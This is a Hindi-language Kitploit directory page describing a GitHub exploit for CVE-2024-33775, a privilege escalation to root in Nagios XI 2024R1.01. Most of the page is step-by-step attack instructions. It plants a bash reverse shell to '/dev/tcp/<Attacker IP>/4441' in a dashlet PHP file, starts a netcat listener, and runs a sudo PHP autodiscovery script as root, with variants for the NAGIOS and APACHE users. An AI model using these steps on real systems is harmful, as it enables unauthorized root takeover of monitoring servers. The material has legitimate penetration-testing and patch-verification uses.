Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-33775 — Nagios XI 2024R1.01 के लिए विशेषाधिकार वृद्धि शोषण, जो NAGIOS या APACHE उपयोगकर्ताओं से दुर्भावनापूर्ण RSS डैशलेट इंजेक्शन और sudo कमांड निष्पादन के माध्यम से पूर्ण रूट एक्सेस सक्षम करता है। | Kitploit
उपकरण/GitHubGitHub/neo-xed/cve-2024-33775
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubneo-xed/cve-2024-33775

CVE-2024-33775

Nagios XI 2024R1.01 के लिए विशेषाधिकार वृद्धि शोषण, जो NAGIOS या APACHE उपयोगकर्ताओं से दुर्भावनापूर्ण RSS डैशलेट इंजेक्शन और sudo कमांड निष्पादन के माध्यम से पूर्ण रूट एक्सेस सक्षम करता है।

रिपॉजिटरी देखें
2 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE द्वारा खोजा गया: K. Wahab (Neo`X)

भेद्यता विवरण:

  • उत्पाद: Nagios XI Version 2024R1.01
  • भेद्यता: उपयोगकर्ता "NAGIOS" या "APACHE" से विशेषाधिकार वृद्धि
  • परिणाम: लक्ष्य प्रणाली पर पूर्ण रूट पहुंच
  • CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-33775

शोषण:

इस उदाहरण में RSS Dashlet का उपयोग किया गया है।

1. Nagios XI का एक नया उदाहरण बनाएं:

  • आप Nagios XI Version 2024R1.01 OVA फ़ाइल यहाँ से डाउनलोड कर सकते हैं: https://assets.nagios.com/downloads/nagiosxi/2024/ovf/nagiosxi-2024R1.0.1-64.ova

2. विशेषाधिकार वृद्धि:

NAGIOS के रूप में शोषण:

  • dashlet .inc.php फ़ाइल में "/usr/local/nagiosxi/html/includes/dashlets/" के अंदर निम्नलिखित सामग्री जोड़ें:
root@kitploit:~
exec('/bin/bash -i >& /dev/tcp/<Attacker IP>/4441 0>&1);
  • हमलावर मशीन पर Netcat लिसनिंग सर्वर प्रारंभ करें:
root@kitploit:~
nc -nlvp 4441
  • विशेषाधिकार बढ़ाने और रूट के रूप में कनेक्शन प्राप्त करने के लिए निम्नलिखित कमांड निष्पादित करें:
root@kitploit:~
sudo /usr/bin/php /usr/local/nagiosxi/scripts/components/autodiscover_new.php --addresses=127.0.0.1/1

APACHE के रूप में शोषण:

  • "dashlets" प्रबंधन पृष्ठ पर जाएं और एक Dashlet डाउनलोड करें:

    root@kitploit:~
    http://TARGET_IP/nagiosxi/admin/dashlets.php?download=rss_dashlet
    
  • *.inc.php को संशोधित करें:

    root@kitploit:~
    exec("sleep 30 && /bin/bash -c '/bin/bash -i >& /dev/tcp/<Attacker IP>/4441 0>&1'");
    

Dashlet_inc_php

  • हमलावर मशीन पर Netcat लिसनिंग सर्वर प्रारंभ करें:
root@kitploit:~
nc -nlvp 4441
  • दुर्भावनापूर्ण dashlet को dashlets प्रबंधन पृष्ठ पर अपलोड करें और APACHE उपयोगकर्ता के रूप में कनेक्शन की प्रतीक्षा करें।
  • विशेषाधिकार बढ़ाने और रूट के रूप में कनेक्शन प्राप्त करने के लिए निम्नलिखित कमांड निष्पादित करें:
root@kitploit:~
sudo /usr/bin/php /usr/local/nagiosxi/scripts/components/autodiscover_new.php --addresses=127.0.0.1/1

(नोट: कमांड निष्पादित करने के बाद आपको APACHE के रूप में कनेक्शन प्राप्त होगा, बाहर निकलने और कई बार फिर से लिसनर शुरू करने के लिए CTRL+C का उपयोग करें)

Apache_root

टूल डाउनलोड करें